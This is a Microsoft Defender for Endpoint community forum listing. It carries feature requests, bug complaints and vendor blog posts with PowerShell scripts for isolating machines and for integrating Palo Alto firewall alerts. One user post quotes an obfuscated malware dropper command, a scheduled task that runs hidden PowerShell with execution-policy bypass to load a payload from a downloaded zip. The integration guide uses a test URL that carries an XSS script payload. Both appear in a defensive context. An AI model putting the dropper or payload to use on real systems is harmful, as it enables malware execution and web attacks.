Latest Discussions
How to Create a Custom Slack Alert for Windows Defender ATP using Microsoft Flow in 5 minutes
MVP WDATP API Hackathon has just ended 2h ago and the first outcome is blogged. If you like the following blog, please credit the author with a "like" here in the tech community. https://azurementor.wordpress.com/2019/03/22/how-to-create-a-custom-slack-alert-for-windows-defender-advanced-threat-protection-atp-using-microsoft-flow-in-5-minutes/

Solved | Dan Michelson | Mar 22, 2019 | Microsoft | 7K Views | 22 likes | 2 Comments

Automate response with Defender ATP and Microsoft Flow
Another cool product of the MVP Summit Hackathon by Stefan Schörling. This step-by-step blog will guide you in how to automate responses with the MDATP Flow connector. Don't forget to show your love: use the like button here and share your feedback in this conversation. http://blog.sec-labs.com/2019/04/automate-response-with-defender-atp-and-microsoft-flow/

Dan Michelson | Apr 08, 2019 | Microsoft | 3.4K Views | 19 likes | 0 Comments

YARA rule support
Hi everybody,

I'm curious if Microsoft is planning to support YARA rules. I think that this will become even more important in the future. I found this very old thread from 2019, where this question was asked by other folks: IS MS looking to support custom YARA rules for Windows Defender ATP - Microsoft Tech Community. Unfortunately, it looks like nothing has happened so far.

Best regards
Stefan

SteBeSec | Apr 17, 2021 | Iron Contributor | 12K Views | 14 likes | 1 Comment

MUST be able to delete duplicate/orphaned devices from M365 Security Center
Good morning,

I am about 2-3 weeks into evaluating Microsoft Defender for Endpoint, and so far have about 4 Windows 10 devices onboarded and managed through Intune policies. One of the test machines was a fairly fresh build (1903) of Windows 10 when it was onboarded. As such it generated over 900+ vulnerabilities in TVM. However, during the course of the next day or two, as it got itself patched all the way to 20H2, it then for some reason generated a duplicate device in the M365 portal - with exactly the same Device AAD id. Currently both the "old" and "new" devices are showing as Active 5 days later.

So first of all, it is a nightmare that the duplicate device was created in the first place with the same Device AAD id - so what happens when one of my customers' networks gets upgraded with 500 Windows 10 devices from version X to 20H2? Are there going to be 500 duplicate devices created??? I read lots of articles yesterday about people seeing this issue as far back as 2018, where they just need to be able to lance out a given machine or machine(s) for whatever reason from the database to keep everything tidy. I spent hours looking for a solution. We have a 180 day retention period set. I'm not waiting 6 months for my database to clean itself up due to a bug in the platform, you've got to be kidding! Given that this has happened after only onboarding 4 devices it's not leaving a good taste in my mouth. And how do I explain this to my customers????

The real problem however is the severe impact this has on the TVM reporting. As I mentioned, the machine patched itself without issue all the way to 20H2; as such all 900+ vulnerabilities have been addressed - like literally *all* of them. However, when I look at any dashboard in Threat & Vulnerability Management the stats are all completely skewed due to this device's statistics still being accounted for.

Given the VALUE of the TVM data, which I think is BRILLIANT - to have the CONTEXT skewed due to this duplicate device bug, but most importantly the lack of basic functionality to remove an orphaned machine to tidy things up, is completely unacceptable. As the administrator of my own estate (and my customers' estates) I should be able to have the final say in terms of a judgement call on what devices should be listed in the portal. Waiting for a device to be inactive for 6 months to have its clean-up routine run by the platform automatically isn't acceptable.

The offboarding script workaround I've been reading about isn't going to cut it either, so please don't suggest it. I tried it using the API explorer method and running the local offboarding script on said machine yesterday. Neither method worked, as both devices 18 hours later are still showing in the portal. This method also doesn't account for machines that (for whatever reason) will not be able to contact the portal to check in and receive the offboarding command (lost device, test device, corrupt device, BYOD - the list goes on).

So...... Microsoft - please, please, please, please - can we get a Delete button in the device actions menu so that we can clean up our estate and keep our TVM figures accurate? Otherwise, what is the point of any of the statistics and recommendations displayed if you can't act on them / have already acted on them?? So when senior management ask "What's our posture?", the answer would unfortunately still be "Dunno."

Thank you.

Solved | James_Gillies | Apr 27, 2021 | Brass Contributor | 34K Views | 11 likes | 18 Comments

[MDE] Add the important feature, Yara rules if possible
Hi,

Refer to this advisory (first link). In addition, you can see that there are Yara rules from GitHub (inside the pdf) (2nd link). All EDR/XDR companies (except Microsoft) already have features and a Yara rule configuration for incident responders to detect with. The method of adding and detecting with Yara rules has been in practice across companies for many years. Would you mind advising on any reason for not adding the important feature, Yara rules? It would be good if you included the important feature, Yara rules. If not, would you mind advising on converting from Yara rules to an MDE query for querying via advanced threat hunting? Thanks, much appreciated. 🙂

https://www.csa.gov.sg/singcert/Advisories/ad-2021-007

This link is the Yara rule:
https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar

https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/yara-rule-support/m-p/2276820

tay76 | Aug 25, 2021 | Copper Contributor | 20K Views | 10 likes | 5 Comments

Automate Windows Defender ATP response action: Machine isolation
5 minutes, low complexity

Response teams rely on powerful actions that allow them to take immediate action when a threat is identified. Being able to automate those response actions is a powerful way to enhance a SecOps team's workflow. In this blog, we're going to demonstrate how you can automate the machine isolation response action.

In our previous blogs we've demonstrated how you can:

- Set up an app and create a script to get WDATP's alerts (Hello World blog). This is a good reference for when you need to create a new app.
- Grant more permissions, and get and update alerts as part of a ticketing/SIEM/SOAR integration (Ticketing System Integration blog). This is a good source of information to learn how to add more permissions on apps.

For response teams, a typical use case involves the ability to enrich SIEM or SOAR playbooks with Windows Defender ATP's powerful remediation capabilities. Just imagine how powerful it can be to detect a malicious activity using your firewall or IPS and isolate the suspicious machine wherever it is (even if the machine is off network at the time of response).

In this blog, we'll walk you through using the machine isolation API. This response action will leave the machine disconnected from any network connection other than the Windows Defender ATP channel (allowing Windows Defender ATP to undo the isolation). What's great about this demonstration is that it can be applied to the other response actions documented here.

Let's start

In this section, we'll walk you through the following:

- Step 1: Add the required permission to your application
- Step 2: Isolate a machine by machine ID or machine name

Step 1 - Add the required permission to the application:

If you haven't created an app: create an app using the instructions described in the Hello World blog, then follow the instructions on how to add the isolation permission as described below.

If you've already created an app that you're going to reuse for this demonstration: add the "Isolate Machine" permission as described below. We recommend that you follow the detailed steps described in "Step 1 - Add the required permission to the application" in the Alert Update API blog.

Add Isolation Permission

1. Open the Azure portal.
2. Navigate to Azure Active Directory > App registrations.
3. Under All Apps, find and select the application, for example ContosoSIEMConnector.
4. Navigate to Settings > Required permissions > Enable Access.
5. Select the checkbox for the "Isolate machine" application permission.
6. Click Save and Grant Permissions.

Done! You have successfully added the required permissions to the application.

Step 2 - Isolate a machine by machine ID or machine name:

Save the following script file as IsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved).

IsolateMachine.ps1

    param (
        [Parameter(Mandatory=$true)][string]$comment,                    # any comment that helps
        [Parameter(Mandatory=$true)][string]$machineIdOrComputerDnsName, # the machineID or ComputerDnsName
        [Parameter(Mandatory=$true)]
        [ValidateSet('Full','Selective')]   # validate that the input contains a valid isolation type
        [string]$isolationType              # the type of machine isolation
    )

    $token = ./Get-Token.ps1   # execute Get-Token.ps1 to get the authorization token
    $url = "https://api.securitycenter.windows.com/api/machines/$machineIdOrComputerDnsName/Isolate"

    $body = @{
        "Comment"       = $comment
        "IsolationType" = $isolationType
    }

    $headers = @{
        'Content-Type' = 'application/json'
        Accept         = 'application/json'
        Authorization  = "Bearer $token"
    }

    $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

    if ($response.StatusCode -eq 201)   # check the response status code
    {
        return $true    # isolation request was accepted
    }
    else
    {
        return $false   # isolation request failed
    }

Example 1: Isolate by machine DNS name

Find the machine FQDN in the machine page (concatenate the machine name and the domain). For example, to isolate the machine testMachine.contoso.com use the following command:

    .\IsolateMachine.ps1 -machineIdOrComputerDnsName testMachine.contoso.com -comment "isolate because of alert" -isolationType Full

Example 2: Isolate by using machine ID

Find the machine ID in the URL of the machine page. For example, to isolate the machine whose machine page URL is https://securitycenter.windows.com/_machine/1f2258dc516c7bf8ec62466e2e876774c0a984f3 use the following command:

    .\IsolateMachine.ps1 -machineIdOrComputerDnsName 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment "isolate because of alert" -isolationType Full

Example 3: Isolate machines with severe alerts

Read high severity alerts as described in the previous blogs, and use the machine ID found in each alert to isolate the machine using the following script.

GetSevereAlertsAndIsolate.ps1

    # Returns alerts created in the past hour and isolates machines with high severity alerts
    $token = .\Get-Token.ps1
    $dateTime = (Get-Date).ToUniversalTime().AddHours(-1).ToString("o")

    # create the url with a filter for date and severity
    $url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime and severity eq 'High'"

    $headers = @{
        'Content-Type' = 'application/json'
        Accept         = 'application/json'
        Authorization  = "Bearer $token"
    }

    $response = Invoke-RestMethod -Method Get -Uri $url -Headers $headers -ErrorAction Stop

    # for each alert, get the machineId and alertId and isolate the machine, writing the alert ID in the isolation comment
    foreach ($alert in $response.value) {
        $machineId = $alert.machineId
        $alertId = $alert.id
        $isolateUrl = "https://api.securitycenter.windows.com/api/machines/$machineId/Isolate"
        $body = @{
            Comment       = "Isolate machine because alert - $alertId"
            IsolationType = "Full"   # the Isolate API expects an isolation type (Full or Selective), as in IsolateMachine.ps1
        }
        $isolateResponse = Invoke-WebRequest -Method Post -Uri $isolateUrl -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

        # check the isolation request status code and write to the log file
        if ($isolateResponse.StatusCode -eq 201) {
            Add-Content c:\temp\api\log.txt "The isolation of machine $machineId ended successfully"
        }
        else {
            Add-Content c:\temp\api\log.txt "Failed to isolate machine $machineId"
        }
    }

Example 4: Release machine (un-isolate)

Save the script below as UnIsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved).

UnIsolateMachine.ps1

    param (
        [Parameter(Mandatory=$true)][string]$comment,    # reason for releasing the machine
        [Parameter(Mandatory=$true)][string]$machineId   # the machineID of the isolated machine
    )

    $token = ./Get-Token.ps1   # execute Get-Token.ps1 to get the authorization token
    $url = "https://api.securitycenter.windows.com/api/machines/$machineId/UnIsolate"

    $body = @{
        Comment = $comment
    }

    $headers = @{
        'Content-Type' = 'application/json'
        Accept         = 'application/json'
        Authorization  = "Bearer $token"
    }

    $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

    # return the machine action object created by the API
    return ($response.Content | ConvertFrom-Json)

Use the script in the same way to release the machine from isolation:

    .\UnIsolateMachine.ps1 -machineId 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment "un-isolate - machine was found clean"

Conclusion:

In this blog we demonstrated how you can easily automate Windows Defender ATP response actions. There are more actions you can automate, such as running an antivirus scan and restricting app execution. For more information, see the other actions here. Let us know if you are interested in more specific remediation examples.

In the next blog we'll demonstrate the integration of alerts from other detection sources. Thanks!

@Haim Goldshtein, security software engineer, Windows Defender ATP
@Dan Michelson, program manager, Windows Defender ATP

Haim Goldshtein | Mar 07, 2019 | Microsoft | 32K Views | 8 likes | 5 Comments

WDATP alert/incident assignment
Hello,

When I look at an alert on the console, I'm able to perform an action that assigns it to myself. I would also like to be able to assign it to others in my organization (we have a team of people who respond to WDATP alerts). Is there any option to do that?

Yury Kissin | Apr 15, 2019 | Brass Contributor | 1.6K Views | 7 likes | 4 Comments

False positive: Suspicious PowEmotet behavior was blocked
Based on social media posts, it seems quite a few of us are experiencing numerous false positive alerts related to 'PowEmotet'. While it's understandable that false positives happen, it's also somewhat amazing this one made it through QA. But this also highlights some things that I find extremely frustrating about Defender for Endpoint. There does not seem to be a reliable way to deal with these at a tenant level, aside from setting the status to "false positive" and potentially adding a file hash of a related executable to Indicators and hoping it goes away. Is there anything I'm missing here? Also, where is Microsoft acknowledging this issue? Where should I go for up-to-the-minute updates on occurrences like this?

GuyThreep | Dec 01, 2021 | Copper Contributor | 6.5K Views | 7 likes | 0 Comments

Malware not detected (but it should)
Some days ago a colleague received an email (O365 ATP protected) and clicked the link inside. The link caused a zip file to be downloaded. The zip contained 2 files, a shortcut and an xml file. The shortcut actually created a scheduled task:

    %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'"

So a cmd was started and then a powershell command to parse the content of the zip file; the zip file contained the string below (to install the malware).

Now the malware is correctly detected, but a week ago it wasn't; the reason for concern is that Defender ATP SHOULD have detected a suspicious activity: a zip was downloaded, the lnk file when double-clicked created a task, the task launched a cmd, the cmd launched a powershell and the powershell went through the file system to get the original zip and install the malware. I'm wondering why no suspicious activity was detected.
I also wonder why there is no way to interact with MSFT support in such a case if you don't have a support plan; the evidence is that I'm facing a product issue.

The string contained at the end of the zip file:

pbaratta | May 29, 2019 | Brass Contributor | 4.7K Views | 6 likes | 4 Comments

Palo Alto Networks and WDATP ad-hoc integration
Integrate your Palo Alto Networks firewall alerts directly into the WDATP machine timeline and alert queue

5 minutes, low complexity

Firewall and IPS/IDS are common tools in every organization's security toolbox. While those tools can proficiently detect suspicious connections to command and control servers (C2 servers) from a client machine, actionable alerts that pinpoint the process which created the connection are not surfaced for security teams to investigate and respond to. In this blog we'll demonstrate how to integrate Palo Alto Networks Next-Gen Firewall alerts with Windows Defender ATP to leverage the power of their detections to identify actionable alerts.

Palo Alto Networks Next-Gen Firewall has an API which allows Palo Alto's customers to get alerts from the alert logs of both the firewall and the WildFire sandbox. You can choose to use the API to get information from a specific firewall appliance, or use the same API with Palo Alto Networks Panorama, which allows you to get the alerts from all of your Palo Alto Networks Next-Gen Firewall and WildFire appliances. You can get the full documentation of the Palo Alto Networks API here.

Let's start

It is only 3 simple steps that will get you the desired integration:

- Step 1: Settings in Palo Alto Networks Next-Gen Firewall: read-only API role creation; user creation and role assignment; update the sample script.
- Step 2: Windows Defender ATP settings: add API permissions.
- Step 3: Test runs: WildFire alert; firewall alert.

Step 1 - Settings in Palo Alto Networks Next-Gen Firewall:

To get the alerts from Palo Alto Networks Next-Gen Firewall we first need to create a user on the firewall with the required permissions:

1. Open the Palo Alto Networks Next-Gen Firewall administration console.
2. Log in as a privileged user.
3. Go to Device > Admin Role > Add.
4. Give a name to the role and remove all the permissions on all tabs except the "Log" permission under the XML-API tab, then click OK.
5. Go to Device > Administrators > Add.
6. Enter a name and a password, choose "Role Based" in the administrator type settings and in the profile field choose the role we created.
7. Important!!! Click Commit in the upper right corner.

Done! You have successfully added a user with the required permissions.

Note: since many organizations leave the firewall with the default self-signed certificate, I've added a bypass in the script (published by PoshKazun on GitHub). If your firewall is set with a trusted certificate you can change the "trustSelfSignCertificate" parameter to false.

Download the PowerShell script attached to this blog and save it in the same folder where you saved the Get-Token.ps1 script from the Hello World blog, and modify the "#### required information from step 1 #####" section. A typical section may look like:

    $firewallURL = "https://TheUrlToYourFirewallMgmtConsole"
    $username = "theNewUserWeCreated"
    $password = "NewUserPassword"
    $alertQueryTimeframe = 30
    $minimumAlertSeverity = "medium"

Done! You have successfully completed the required steps to use the Palo Alto Networks API.

Step 2: Settings in Windows Defender ATP

In this step, we will add the required permissions to Windows Defender ATP. We will add the permissions to the application we set up in the Hello World blog. If you didn't set up an application yet, you need to follow the Hello World blog's 3 short steps to create one. First, we need to add the permissions "Run advanced queries" and "Read and write all alerts":

1. Open the Azure portal.
2. Navigate to Azure Active Directory > App registrations.
3. Under All Apps, find and select the application, for example, ContosoSIEMConnector.
4. Navigate to Settings > Required permissions > Enable Access.
5. Select the checkboxes for the "Run advanced queries" and "Read and write all alerts" application permissions.
6. Click Save and Grant Permissions.

Done! You have successfully added the required permissions to Windows Defender ATP.

Step 3: Test runs

WildFire alert

Download the Palo Alto Networks WildFire test file and create an alert in the WDATP portal:

1. Open your browser and navigate to https://wildfire.paloaltonetworks.com/publicapi/test/pe
2. Wait 5-10 minutes and run the PowerShell script.

Firewall alert

Create a fake suspicious network connection and create an alert in the WDATP portal:

1. Open your browser and navigate to https://testing.com/book.html?default=<script>alert(XSS test)</script>
2. Wait 5 minutes and run the PowerShell script.

Note: if your firewall policy action for vulnerabilities is set to "Reset-both", then the firewall will reset the connection before it starts. In that case, you will not find network connection telemetry in the WDATP portal.

Now open the WDATP portal and look for the alerts. You should find the Palo Alto Networks firewall alert and the Palo Alto Networks WildFire alerts in the WDATP alert queue, and in the machine timeline.

Recommendations:

We recommend scheduling the integration script to run every 20 minutes with alertQueryTimeframe set to 30 minutes to allow overlap.

Conclusion:

While network protection solutions catch threats at the network bottleneck, they still miss the context and the ability to remediate the endpoint. The combination of Palo Alto Networks firewall and WDATP creates a unique better-together value from detection to remediation. In future blogs we'll show you how to force AutoIR to automatically remediate the root of the threat. You can follow these steps to create Windows Defender ATP alerts from other security/SOAR/SIEM solutions. Let us know if you are interested in integrating alerts from other sources. Thanks!

@Haim Goldshtein, security software engineer, Windows Defender ATP
@Dan Michelson, program manager, Windows Defender ATP
@Ben Alfasi, software engineer, Windows Defender ATP

Haim Goldshtein | Mar 16, 2019 | Microsoft | 20K Views | 6 likes | 13 Comments